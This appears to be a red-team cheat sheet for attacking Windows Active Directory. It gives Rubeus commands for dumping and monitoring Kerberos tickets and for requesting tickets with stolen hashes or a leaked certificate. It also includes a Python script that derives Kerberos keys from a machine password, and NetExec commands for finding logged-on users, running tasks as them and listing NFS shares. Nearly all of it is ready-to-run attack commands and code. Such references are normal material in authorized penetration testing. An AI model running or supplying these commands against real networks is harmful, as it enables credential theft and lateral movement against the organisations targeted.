Tool cheat sheet
Rubeus
Instead of LSASS handles, Rubeus uses Windows APIs, making it "less" noisy.
When dumping or requesting Kerberos tickets, use
/nowrapto make copy/pasting easier.
| Command | Privileges | Description |
|---|---|---|
triage | User/Admin | List Kerberos tickets of current session or all sessions (if admin rights are present) |
dump | User/Admin | Dump Kerberos tickets from current session or all sessions. You can add \service: / /luid: to only dump a specific ticket (use Rubeus.exe triage first). |
monitor | Admin | Actively monitor for tickets being cached and dump them: Rubeus.exe monitor /interval:seconds /nowrap (remember to stop it). |
hash | User | Create valid hashes for a user or machine account. Example: hash /user:user /password:password /domain:domain |
asktgt | User | Ask the DC for a valid TGT using NTLM or AES hash |
request | User | Ask the CA for a user certificate (supply both /ca: and /template:) |
powershell
# Request TGTs and put them into a netlogon session (password, rc4, aes hash, certificate)
Rubeus.exe asktgt /createnetonly:cmd.exe /show /user:TODO /password:TODO
Rubeus.exe asktgt /createnetonly:cmd.exe /show /user:TODO /rc4:TODO
Rubeus.exe asktgt /createnetonly:cmd.exe /show /user:TODO /aes256:TODO
Rubeus.exe asktgt /createnetonly:cmd.exe /show /user:TODO /certificate:C:\temp\leaked.pfx
# Monitor / read tickets (e.g. kerberos delegation)
Rubeus.exe monitor /nowrap /interval:30
Rubeus.exe triage /nowrapConvert HEX computer machine password to AES key for Rubeus
https://snovvcrash.rocks/2021/05/21/calculating-kerberos-keys.html
python
#!/usr/bin/env python3
from binascii import unhexlify, hexlify
from impacket.krb5 import constants
from impacket.krb5.crypto import Key, string_to_key
from Cryptodome.Hash import MD4
allciphers = {
'rc4_hmac_nt': int(constants.EncryptionTypes.rc4_hmac.value),
'aes128_hmac': int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
'aes256_hmac': int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value)
}
def printKerberosKeys(password, salt):
for name, cipher in allciphers.items():
if cipher == 23:
md4 = MD4.new()
md4.update(password)
key = Key(cipher, md4.digest())
else:
fixedPassword = password.decode('utf-16-le', 'replace').encode('utf-8', 'replace')
key = string_to_key(cipher, fixedPassword, salt)
print(f' * {name}: {hexlify(key.contents).decode(\"utf-8\")}')
def printMachineKerberosKeys(domain, hostname, hexpassword):
salt = b'%shost%s.%s' % (domain.upper().encode('utf-8'), hostname.lower().encode('utf-8'), domain.lower().encode('utf-8'))
rawpassword = unhexlify(hexpassword)
print(f'{domain.upper()}\\\\{hostname.upper()}$')
print(f' * Salt: {salt.decode(\"utf-8\")}')
printKerberosKeys(rawpassword, salt)
def printUserKerberosKeys(domain, username, rawpassword):
salt = b'%s%s' % (domain.upper().encode('utf-8'), username.encode('utf-8'))
rawpassword = rawpassword.encode('utf-16-le')
print(f'{domain.upper()}\\\\{username}')
print(f' * Salt: {salt.decode(\"utf-8\")}')
printKerberosKeys(rawpassword, salt)
printMachineKerberosKeys(\"lab.internal\", \"hostname\", \"<hex-machinepassword>\")Output:
powershell
PS & C:/Users/User/python3.12.exe \"c:/Users/User/Untitled-1.py\"
LAB.INTERNAL\\<HOSTNMAE>$
* Salt: LAB.INTERNALhosthostnamelab.internal
* rc4_hmac_nt: <rc4_hmac_nt>
* aes128_hmac: <aes128_hmac>
* aes256_hmac: <aes256_hmac>NetExec
Get logged-on users:
powershell
# Password spray
nxc smb IP -u username -p 'pwd' --loggedon-users
# Execute scheduled task as loggedon user:
nxc smb IP -u username -p 'pwd' -M schtask_as -o USER=usr1 CMD=whoamiEnumerate NFS shares:
powershell
# Enumerate shares on target ip
nxc nfs <ip> --shares
# List files of fileshare
nxc nfs <ip> --share '/var/nfs/general' --ls '/'